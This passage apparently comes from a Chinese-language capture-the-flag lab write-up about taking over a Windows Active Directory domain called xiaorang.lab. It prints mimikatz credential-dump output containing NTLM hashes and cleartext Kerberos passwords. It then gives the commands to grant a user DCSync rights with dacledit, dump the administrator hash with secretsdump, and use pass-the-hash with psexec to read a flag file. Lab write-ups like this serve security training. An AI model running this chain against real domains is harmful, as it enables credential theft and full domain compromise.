* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 86039 (00000000:00015017)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/3/4 18:58:45
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52703 (00000000:0000cddf)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : b5cd3591a58e1169186bcdbfd4b6322d
* SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/3/4 18:58:42
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
mimikatz(commandline)
Bye!
|
抓取到CHENGLEI的ntlm
1
2
3
4
5
6
| [00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
|
用这个ntlm去修改他自己的acl,让其拥有DCSync权限
1
| proxychains4 -q python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6
|
利用DCSync导出域控的凭据
1
| proxychains4 -q python3 secretsdump.py xiaorang.lab/chenglei@172.22.13.6 -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-user administrator
|
pth拿flag
1
| proxychains4 -q python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a administrator@172.22.13.6
|
1
| type C:\Users\Administrator\flag\flag04.txt
|
